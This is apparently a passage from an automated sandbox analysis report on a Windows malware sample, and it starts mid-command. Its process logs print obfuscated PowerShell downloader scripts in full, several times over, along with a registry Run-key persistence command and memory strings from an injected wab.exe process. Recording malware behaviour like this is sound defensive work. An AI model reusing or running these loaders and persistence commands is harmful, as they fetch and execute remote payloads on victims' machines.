');tilfredsstillelse (viscometres 't,[jon lekrt.n.vas e ur v,oisic .ecap,co ki .nkntd,mfiacrn cavagase err ] e:de:,os eafchaufrrf ientprytaplirbeomet sopecm.o.il k es=m ,d[ onste .tsj. ,safen,ckrut r tiuntcoysopskr aot t ohjc ao,glbotfiybrpq e.e] c:va:u.t ,ls.s f1,r2.r ');$bageriers=$leveredes[0];$varmeslangens= (viscometres 'cu$dig wl dop.bskaval :uilc.igeg eansinto,istl ml ii snsugfieb,r.nnf.e lsda=dinenep wan-wooskb tjb,eq,cm.t ps.ayhus nt.le smdi.hinchecotfo.nowexespb.mct,l tiemedin dt');$varmeslangens+=$stoneroot[1];tilfredsstillelse ($varmeslangens);tilfredsstillelse (viscometres 'or$ ol gi bgr,eg,szit cibrl.ul ,it.nmigklenorfonune s r.glhree dapeddie,orbls.f[af$kompaifeltri se ,u sp flora.unste fr,kn .e,a]go=me$mea bn,kn ,e pghir kegat defesje ');$mosegrundene=viscometres ' e$ .lk.i.rg sevus,etgii,olp lnei ,ngeg,oemyrlindrenas o.fld noalwinnsulhyokrau.dspfski pls ekr(kr$ ,bfua cgbnefirreiste,trhesbr,,r$ber kefoh ,ararlidine ,nfu) d ';$reharden=$stoneroot[0];tilfredsstillelse (viscometres ',e$ g .lmoo db ,aenl r: hfshu oshaitioean bs.dar,amer.te hndreno=vi(,ytwievrsf t - .p sa.mt mh s .o$svr mepuhbra orredspeunnre) a ');while (!$fusionsaarene) {tilfredsstillelse (viscometres 'af$.ogemlreo sbuna ,lls: inbrobon osbioprlreupeb.nlclyfr=c.$mitrarlau ek ') ;tilfredsstillelse $mosegrundene;tilfredsstillelse (viscometres 'uns tt ma.ir rt a- tspils etrefap v ,
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "if (${host}.currentuiculture) {$alismataceae='substr';$lotah++;}$alismataceae+='ing';function viscometres($rubellosis){$overdaadigt=$rubellosis.length-$lotah;for( $dekanterendes=2;$dekanterendes -lt $overdaadigt;$dekanterendes+=3){$firblads159+=$rubellosis.$alismataceae.'invoke'( $dekanterendes, $lotah);}$firblads159;}function tilfredsstillelse($konerne){ . ($hemibasidiomycetes) ($konerne);}$annegretes=viscometres 'bumvio.lznyiefl,ilprapr/sn5te.fr0f ,l(gaw ti.anspds o,aw asfi h n atas z1,a0sy.ud0bi;bi tpw ,iopnv,6te4 c; r bix p6ud4ng; ,trunv ,: .1sk2,r1,l.di0va),n ,gpre .cskk og,/sm2fa0r.1ug0 .0ap1so0 r1ge vefs.isar destfrioraxku/ 1 p2,h1os. .0 , ';$milieuplanerne=viscometres 'youveslreterpr-w a,rgrhe,yn,ct.u ';$bageriers=viscometres 'enhfotant p l:re/.l/ilcn.p.oajuns.e lc.-sma ndd.m ,iopnt.h uopesf t e..fcu.okom.a/des ptn emevchnsts t1ta7 c9si.r myoiaux.o ';$arish=viscometres 'se>re ';$hemibasidiomycetes=viscometres 'amigeeprxud ';$svaerd='incisal';$dekanterendesndoneser = viscometres 'w,er,cexh eoch f %reainpcap dl ap,tu.amo%h.\chblie.olasi un sdtoade1ch0 .3 .xoetofint,t ,&co& s semec ehs.o,i gltuf ';tilfredsstillelse (viscometres 'me$.ig olbloedbgua.lld,:hisett mo ans.e er.foniolate = s(arctym.edwl m / rc u k$ ndd,e ,k gakanefti eoprt.e onoudhne.ostan,idpuo,on lekes ienurls),f ');tilfredsstillelse (viscometres 'ta$ovg klspokrbs aunl ,:jol ieh v de draneyed teresbo=i.$ kbzia vgreer,r,ei eepyr eshy.trst,perl.aitat,e( .$,oa .rraienssch o)ph ');tilfredsstillelse (viscometres 't,[jon lekrt.n.vas e ur v,oisic .ecap,co ki .nkntd,mfiacrn cavagase err ] e:de:,os eafchaufrrf ientprytaplirbeomet sopecm.o.il k es=m ,d[ onste .tsj. ,safen,ckrut r tiuntcoysopskr aot t ohjc ao,glbotfiybrpq e.e] c:va:u.t ,ls.s f1,r2.r ');$bageriers=$leveredes[0];$varmeslangens= (viscometres 'cu$dig wl dop.bskaval :uilc.igeg eansinto,istl ml ii snsugfieb,r.nnf.e lsda=dinenep wan-wooskb tjb,eq,cm.t ps.ayhus nt.le smdi.hinchecotfo.nowexespb.mct,l tiemedin dt');$varmeslangens+=$stoneroot[1];tilfredsstillelse ($varmeslangens);tilfredsstillelse (viscometres 'or$ ol gi bgr,eg,szit cibrl.ul ,it.nmigklenorfonune s r.glhree dapeddie,orbls.f[af$kompaifeltri se ,u sp flora.unste fr,kn .e,a]go=me$mea bn,kn ,e pghir kegat defesje ');$mosegrundene=viscometres ' e$ .lk.i.rg sevus,etgii,olp lnei ,ngeg,oemyrlindrenas o.fld noalwinnsulhyokrau.dspfski pls ekr(kr$ ,bfua cgbnefirreiste,trhesbr,,r$ber kefoh ,ararlidine ,nfu) d ';$reharden=$stoneroot[0];tilfredsstillelse (viscometres ',e$ g .lmoo db ,aenl r: hfshu oshaitioean bs.dar,amer.te hndreno=vi(,ytwievrsf t - .p sa.mt mh s .o$svr mepuhbra orredspeunnre) a ');while (!$fusionsaarene) {tilfredsstillelse (viscometres 'af$.ogemlreo sbuna ,lls: inbrobon osbioprlreupeb.nlclyfr=c.$mitrarlau ek ') ;tilfredsstillelse $mosegrundene;tilfredsstillelse (viscometres 'uns tt ma.ir rt a- tspils etrefap v ,
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "bilateralities" /t reg_expand_sz /d "%arrestationernes110% -w 1 $faucals83=(get-itemproperty -path 'hkcu:\sttyskers\').talevant;%arrestationernes110% ($faucals83)"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "if (${host}.currentuiculture) {$afgiftskolonners42nchamber='substr';$apocrisiary++;}$afgiftskolonners42nchamber+='ing';function indbandtes($forsimple){$afrettere=$forsimple.length-$apocrisiary;for( $afgiftskolonners42=2;$afgiftskolonners42 -lt $afrettere;$afgiftskolonners42+=3){$nedgangene+=$forsimple.$afgiftskolonners42nchamber.'invoke'( $afgiftskolonners42, $apocrisiary);}$nedgangene;}function sloshily($parasollernes){ & ($paprr) ($parasollernes);}$velproevet=indbandtes 'hemb.o dzm,i.elfil sa u/sc5 p. g0ry n( sw,oi.an.md,to tw.hs . s.ns,tse s1.o0ar.he0ca; h ,ewhji nnki6 .4su;pr tyxbo6,v4g ;ke ulrd v a: ,1 d2 e1ch.pr0di)se ,rgr.e mc ,kb.ofo/se2fe0ca1 b0su0r 1in0s,1r o,fsliinrmue sfduoauxf./l,1zi2ar1r.. u0al ';$hennes=indbandtes ' ,udisepea.rg -gga eg ,ey.nbytb. ';$reveled=indbandtes 'sthf.tsetf.phos.l:po/.o/awa ,vuno,rchyarelofdnao dp.oet r hure.idcnooc.m.r/nejdrofyucos .e ,4ma. .p n bga.>mih.itqttdep os.o:fr/in/r a vs.ogacskapilo,dsoo ,p ,ebers,u.ao enprean.socr.osymfj/ .je,ocouarsvieb 4,d.fap bnb,g , ';$jejune203=indbandtes 'va>in ';$paprr=indbandtes 'b,ip,e hx h ';$gushet='zaristiske';$ansvarsbevidsthed = indbandtes 'foeaac,vhguo e me%coag pj pkudadas t ba,u%,l\lin ,eskgmalc.il.greep.nbrt p.nogn.a bs s he& p& i ,oea,comhb os. ptul ';sloshily (indbandtes ' u$prg glveo.eb a rlgl: .aobrs,n.pi ln cgfoepa=s,( lc emsmdre i./sical fi$s,aabn,as av oaoprlasbub.rea v si udalspothehude .dri) c ');sloshily (indbandtes 'co$deg tltaog.bpeaaclsu:mobpalseojeds.s .ksma tmtesunf,oo .rsphunoallm dinsp,=sl$ mr re fveke rlcaev dad.ves.lpu lpiivatpa(ta$dejkoedij.nu ansiefe2ka0 ,3se)hy ');sloshily (indbandtes ' f[monure tc .als.ee .r,hv mi.kc ,e apleoinic,npet,imtoabln.eaapgheetrr t]d.:es: esbreaeckouobr.hisattuybepdrr eo,rt.ao gc no lna h,=le m[fonpae otop. schepac .uberkiiprtbey,cpt.r obutunorec ho ,lf,tshypop xesl]dr:k :s,t slfosb.1ir2to ');$reveled=$blodskamsforholds[0];$lnindeholde= (indbandtes ',o$ g.il sorhblia kln,: ag vn,uachv,oeder.hi.ee .t es =kan.cev.w e-lrou,b ojtre,ocprt tst ybls ttg.e fmkr.slna.e.kt.e.mdw etrbdrcinlsoiajeovngyt');$lnindeholde+=$arninge[1];sloshily ($lnindeholde);sloshily (indbandtes 'fo$ung fn gac,vfleafrraiadeprt,hs s.krhadedealsds enyr,rsge[ag$unhk.e snvgnbre us s]ov= e$guv ,esclmop ,rdroveer.v ecrtsk ');$billardkers=indbandtes 'sa$.vgunn,racovaneu,r oio,ecatlysn,.codcaobrwp.ntel uokoa kdraf ri .lpreme(.j$harneedrvo,efal,nemed b,fo$pag oe mr oms.a ununis.es,sj.) . ';$germanies=$arninge[0];sloshily (indbandtes 'sa$tngsclwhofob ba alc,: ,s .asta,fre r tabrnfrdctemenra4 c=di(s t meflsort.r-stpscaort .hc lu$prgskepyr fmasaman kis.e,esk,)bu ');while (!$saarranden4) {sloshily (indbandtes 'ly$,ugk.lf o sbsuastlfo:ann .oafn.yf.oawevseoa,r ga obeul,ue,r= .$satm.r cunoe t ') ;sloshily $billardkers;sloshily (indbandtes 'mustotp.a,eru.t -bas plmieduetep e g.4tr ');sloshily (indbandtes 'ge$ovgbalu oribanacil h: gs.naJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "if (${host}.currentuiculture) {$afgiftskolonners42nchamber='substr';$apocrisiary++;}$afgiftskolonners42nchamber+='ing';function indbandtes($forsimple){$afrettere=$forsimple.length-$apocrisiary;for( $afgiftskolonners42=2;$afgiftskolonners42 -lt $afrettere;$afgiftskolonners42+=3){$nedgangene+=$forsimple.$afgiftskolonners42nchamber.'invoke'( $afgiftskolonners42, $apocrisiary);}$nedgangene;}function sloshily($parasollernes){ & ($paprr) ($parasollernes);}$velproevet=indbandtes 'hemb.o dzm,i.elfil sa u/sc5 p. g0ry n( sw,oi.an.md,to tw.hs . s.ns,tse s1.o0ar.he0ca; h ,ewhji nnki6 .4su;pr tyxbo6,v4g ;ke ulrd v a: ,1 d2 e1ch.pr0di)se ,rgr.e mc ,kb.ofo/se2fe0ca1 b0su0r 1in0s,1r o,fsliinrmue sfduoauxf./l,1zi2ar1r.. u0al ';$hennes=indbandtes ' ,udisepea.rg -gga eg ,ey.nbytb. ';$reveled=indbandtes 'sthf.tsetf.phos.l:po/.o/awa ,vuno,rchyarelofdnao dp.oet r hure.idcnooc.m.r/nejdrofyucos .e ,4ma. .p n bga.>mih.itqttdep os.o:fr/in/r a vs.ogacskapilo,dsoo ,p ,ebers,u.ao enprean.socr.osymfj/ .je,ocouarsvieb 4,d.fap bnb,g , ';$jejune203=indbandtes 'va>in ';$paprr=indbandtes 'b,ip,e hx h ';$gushet='zaristiske';$ansvarsbevidsthed = indbandtes 'foeaac,vhguo e me%coag pj pkudadas t ba,u%,l\lin ,eskgmalc.il.greep.nbrt p.nogn.a bs s he& p& i ,oea,comhb os. ptul ';sloshily (indbandtes ' u$prg glveo.eb a rlgl: .aobrs,n.pi ln cgfoepa=s,( lc emsmdre i./sical fi$s,aabn,as av oaoprlasbub.rea v si udalspothehude .dri) c ');sloshily (indbandtes 'co$deg tltaog.bpeaaclsu:mobpalseojeds.s .ksma tmtesunf,oo .rsphunoallm dinsp,=sl$ mr re fveke rlcaev dad.ves.lpu lpiivatpa(ta$dejkoedij.nu ansiefe2ka0 ,3se)hy ');sloshily (indbandtes ' f[monure tc .als.ee .r,hv mi.kc ,e apleoinic,npet,imtoabln.eaapgheetrr t]d.:es: esbreaeckouobr.hisattuybepdrr eo,rt.ao gc no lna h,=le m[fonpae otop. schepac .uberkiiprtbey,cpt.r obutunorec ho ,lf,tshypop xesl]dr:k :s,t slfosb.1ir2to ');$reveled=$blodskamsforholds[0];$lnindeholde= (indbandtes ',o$ g.il sorhblia kln,: ag vn,uachv,oeder.hi.ee .t es =kan.cev.w e-lrou,b ojtre,ocprt tst ybls ttg.e fmkr.slna.e.kt.e.mdw etrbdrcinlsoiajeovngyt');$lnindeholde+=$arninge[1];sloshily ($lnindeholde);sloshily (indbandtes 'fo$ung fn gac,vfleafrraiadeprt,hs s.krhadedealsds enyr,rsge[ag$unhk.e snvgnbre us s]ov= e$guv ,esclmop ,rdroveer.v ecrtsk ');$billardkers=indbandtes 'sa$.vgunn,racovaneu,r oio,ecatlysn,.codcaobrwp.ntel uokoa kdraf ri .lpreme(.j$harneedrvo,efal,nemed b,fo$pag oe mr oms.a ununis.es,sj.) . ';$germanies=$arninge[0];sloshily (indbandtes 'sa$tngsclwhofob ba alc,: ,s .asta,fre r tabrnfrdctemenra4 c=di(s t meflsort.r-stpscaort .hc lu$prgskepyr fmasaman kis.e,esk,)bu ');while (!$saarranden4) {sloshily (indbandtes 'ly$,ugk.lf o sbsuastlfo:ann .oafn.yf.oawevseoa,r ga obeul,ue,r= .$satm.r cunoe t ') ;sloshily $billardkers;sloshily (indbandtes 'mustotp.a,eru.t -bas plmieduetep e g.4tr ');sloshily (indbandtes 'ge$ovgJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "if (${host}.currentuiculture) {$alismataceae='substr';$lotah++;}$alismataceae+='ing';function viscometres($rubellosis){$overdaadigt=$rubellosis.length-$lotah;for( $dekanterendes=2;$dekanterendes -lt $overdaadigt;$dekanterendes+=3){$firblads159+=$rubellosis.$alismataceae.'invoke'( $dekanterendes, $lotah);}$firblads159;}function tilfredsstillelse($konerne){ . ($hemibasidiomycetes) ($konerne);}$annegretes=viscometres 'bumvio.lznyiefl,ilprapr/sn5te.fr0f ,l(gaw ti.anspds o,aw asfi h n atas z1,a0sy.ud0bi;bi tpw ,iopnv,6te4 c; r bix p6ud4ng; ,trunv ,: .1sk2,r1,l.di0va),n ,gpre .cskk og,/sm2fa0r.1ug0 .0ap1so0 r1ge vefs.isar destfrioraxku/ 1 p2,h1os. .0 , ';$milieuplanerne=viscometres 'youveslreterpr-w a,rgrhe,yn,ct.u ';$bageriers=viscometres 'enhfotant p l:re/.l/ilcn.p.oajuns.e lc.-sma ndd.m ,iopnt.h uopesf t e..fcu.okom.a/des ptn emevchnsts t1ta7 c9si.r myoiaux.o ';$arish=viscometres 'se>re ';$hemibasidiomycetes=viscometres 'amigeeprxud ';$svaerd='incisal';$dekanterendesndoneser = viscometres 'w,er,cexh eoch f %reainpcap dl ap,tu.amo%h.\chblie.olasi un sdtoade1ch0 .3 .xoetofint,t ,&co& s semec ehs.o,i gltuf ';tilfredsstillelse (viscometres 'me$.ig olbloedbgua.lld,:hisett mo ans.e er.foniolate = s(arctym.edwl m / rc u k$ ndd,e ,k gakanefti eoprt.e onoudhne.ostan,idpuo,on lekes ienurls),f ');tilfredsstillelse (viscometres 'ta$ovg klspokrbs aunl ,:jol ieh v de draneyed teresbo=i.$ kbzia vgreer,r,ei eepyr eshy.trst,perl.aitat,e( .$,oa .rraienssch o)ph ');tilfredsstillelse (viscometres 't,[jon lekrt.n.vas e ur v,oisic .ecap,co ki .nkntd,mfiacrn cavagase err ] e:de:,os eafchaufrrf ientprytaplirbeomet sopecm.o.il k es=m ,d[ onste .tsj. ,safen,ckrut r tiuntcoysopskr aot t ohjc ao,glbotfiybrpq e.e] c:va:u.t ,ls.s f1,r2.r ');$bageriers=$leveredes[0];$varmeslangens= (viscometres 'cu$dig wl dop.bskaval :uilc.igeg eansinto,istl ml ii snsugfieb,r.nnf.e lsda=dinenep wan-wooskb tjb,eq,cm.t ps.ayhus nt.le smdi.hinchecotfo.nowexespb.mct,l tiemedin dt');$varmeslangens+=$stoneroot[1];tilfredsstillelse ($varmeslangens);tilfredsstillelse (viscometres 'or$ ol gi bgr,eg,szit cibrl.ul ,it.nmigklenorfonune s r.glhree dapeddie,orbls.f[af$kompaifeltri se ,u sp flora.unste fr,kn .e,a]go=me$mea bn,kn ,e pghir kegat defesje ');$mosegrundene=viscometres ' e$ .lk.i.rg sevus,etgii,olp lnei ,ngeg,oemyrlindrenas o.fld noalwinnsulhyokrau.dspfski pls ekr(kr$ ,bfua cgbnefirreiste,trhesbr,,r$ber kefoh ,ararlidine ,nfu) d ';$reharden=$stoneroot[0];tilfredsstillelse (viscometres ',e$ g .lmoo db ,aenl r: hfshu oshaitioean bs.dar,amer.te hndreno=vi(,ytwievrsf t - .p sa.mt mh s .o$svr mepuhbra orredspeunnre) a ');while (!$fusionsaarene) {tilfredsstillelse (viscometres 'af$.ogemlreo sbuna ,lls: inbrobon osbioprlreupeb.nlclyfr=c.$mitrarlau ek ') ;tilfredsstillelse $mosegrundene;tilfredsstillelse (viscometres 'uns tt ma.ir rt a- tspils etrefap v ,Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "if (${host}.currentuiculture) {$alismataceae='substr';$lotah++;}$alismataceae+='ing';function viscometres($rubellosis){$overdaadigt=$rubellosis.length-$lotah;for( $dekanterendes=2;$dekanterendes -lt $overdaadigt;$dekanterendes+=3){$firblads159+=$rubellosis.$alismataceae.'invoke'( $dekanterendes, $lotah);}$firblads159;}function tilfredsstillelse($konerne){ . ($hemibasidiomycetes) ($konerne);}$annegretes=viscometres 'bumvio.lznyiefl,ilprapr/sn5te.fr0f ,l(gaw ti.anspds o,aw asfi h n atas z1,a0sy.ud0bi;bi tpw ,iopnv,6te4 c; r bix p6ud4ng; ,trunv ,: .1sk2,r1,l.di0va),n ,gpre .cskk og,/sm2fa0r.1ug0 .0ap1so0 r1ge vefs.isar destfrioraxku/ 1 p2,h1os. .0 , ';$milieuplanerne=viscometres 'youveslreterpr-w a,rgrhe,yn,ct.u ';$bageriers=viscometres 'enhfotant p l:re/.l/ilcn.p.oajuns.e lc.-sma ndd.m ,iopnt.h uopesf t e..fcu.okom.a/des ptn emevchnsts t1ta7 c9si.r myoiaux.o ';$arish=viscometres 'se>re ';$hemibasidiomycetes=viscometres 'amigeeprxud ';$svaerd='incisal';$dekanterendesndoneser = viscometres 'w,er,cexh eoch f %reainpcap dl ap,tu.amo%h.\chblie.olasi un sdtoade1ch0 .3 .xoetofint,t ,&co& s semec ehs.o,i gltuf ';tilfredsstillelse (viscometres 'me$.ig olbloedbgua.lld,:hisett mo ans.e er.foniolate = s(arctym.edwl m / rc u k$ ndd,e ,k gakanefti eoprt.e onoudhne.ostan,idpuo,on lekes ienurls),f ');tilfredsstillelse (viscometres 'ta$ovg klspokrbs aunl ,:jol ieh v de draneyed teresbo=i.$ kbzia vgreer,r,ei eepyr eshy.trst,perl.aitat,e( .$,oa .rraienssch o)ph ');tilfredsstillelse (viscometres 't,[jon lekrt.n.vas e ur v,oisic .ecap,co ki .nkntd,mfiacrn cavagase err ] e:de:,os eafchaufrrf ientprytaplirbeomet sopecm.o.il k es=m ,d[ onste .tsj. ,safen,ckrut r tiuntcoysopskr aot t ohjc ao,glbotfiybrpq e.e] c:va:u.t ,ls.s f1,r2.r ');$bageriers=$leveredes[0];$varmeslangens= (viscometres 'cu$dig wl dop.bskaval :uilc.igeg eansinto,istl ml ii snsugfieb,r.nnf.e lsda=dinenep wan-wooskb tjb,eq,cm.t ps.ayhus nt.le smdi.hinchecotfo.nowexespb.mct,l tiemedin dt');$varmeslangens+=$stoneroot[1];tilfredsstillelse ($varmeslangens);tilfredsstillelse (viscometres 'or$ ol gi bgr,eg,szit cibrl.ul ,it.nmigklenorfonune s r.glhree dapeddie,orbls.f[af$kompaifeltri se ,u sp flora.unste fr,kn .e,a]go=me$mea bn,kn ,e pghir kegat defesje ');$mosegrundene=viscometres ' e$ .lk.i.rg sevus,etgii,olp lnei ,ngeg,oemyrlindrenas o.fld noalwinnsulhyokrau.dspfski pls ekr(kr$ ,bfua cgbnefirreiste,trhesbr,,r$ber kefoh ,ararlidine ,nfu) d ';$reharden=$stoneroot[0];tilfredsstillelse (viscometres ',e$ g .lmoo db ,aenl r: hfshu oshaitioean bs.dar,amer.te hndreno=vi(,ytwievrsf t - .p sa.mt mh s .o$svr mepuhbra orredspeunnre) a ');while (!$fusionsaarene) {tilfredsstillelse (viscometres 'af$.ogemlreo sbuna ,lls: inbrobon osbioprlreupeb.nlclyfr=c.$mitrarlau ek ') ;tilfredsstillelse $mosegrundene;tilfredsstillelse (viscometres 'uns tt ma.ir rt a- tspils etrefap v ,
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "bilateralities" /t reg_expand_sz /d "%arrestationernes110% -w 1 $faucals83=(get-itemproperty -path 'hkcu:\sttyskers\').talevant;%arrestationernes110% ($faucals83)"
              Source: wab.exe, 0000000A.00000003.2228838836.0000000000B63000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.4221123486.0000000000B62000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager:0ws
              Source: wab.exe, 0000000A.00000003.2268500309.0000000000BCC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.4222010144.0000000000BCC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2269959379.0000000000BCC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: wab.exe, 0000000A.00000002.4244405887.0000000023F41000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2228838836.0000000000B63000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [2024/08/28 08:01:53 Program Manager]
              Source: wab.exe, 0000000A.00000002.4222010144.0000000000BCC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager]J@)
              Source: wab.exe, 0000000A.00000002.4222010144.0000000000BCC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerPJ=)Z&
              Source: wab.exe, 0000000A.00000002.4221123486.0000000000B62000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [2024/08/28 08:02:00 Program Manager]
              Source: wab.exe, 0000000A.00000002.4222010144.0000000000BCC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager~J
              Source: wab.exe, 0000000A.00000002.4222010144.0000000000BCC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerr|
              Source: wab.exe, 0000000A.00000002.4222010144.0000000000BCC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerjJ3)
              Source: wab.exe, 0000000A.00000002.4244405887.0000000023F41000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.4221123486.0000000000B62000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [2024/08/28 08:03:39 Program Manager]
              Source: wab.exe, 0000000A.00000003.2228838836.0000000000B63000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.4221123486.0000000000B62000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [%04i/%02i/%02i %02i:%02i:%02i Program Manager]
              Source: wab.exe, 0000000A.00000002.4222010144.0000000000BCC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagertX@fn
              Source: wab.exe, 0000000A.00000002.4222010144.0000000000BCC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerFJG)t$
              Source: wab.exe, 0000000A.00000002.4221123486.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.4221949132.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.4244405887.0000000023F2C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
              Source: wab.exe, 0000000A.00000002.4222010144.0000000000BCC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager{J")
              Source: wab.exe, 0000000A.00000002.4222010144.0000000000BCC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagertK
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_23D72933 cpuid 10_2_23D72933
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
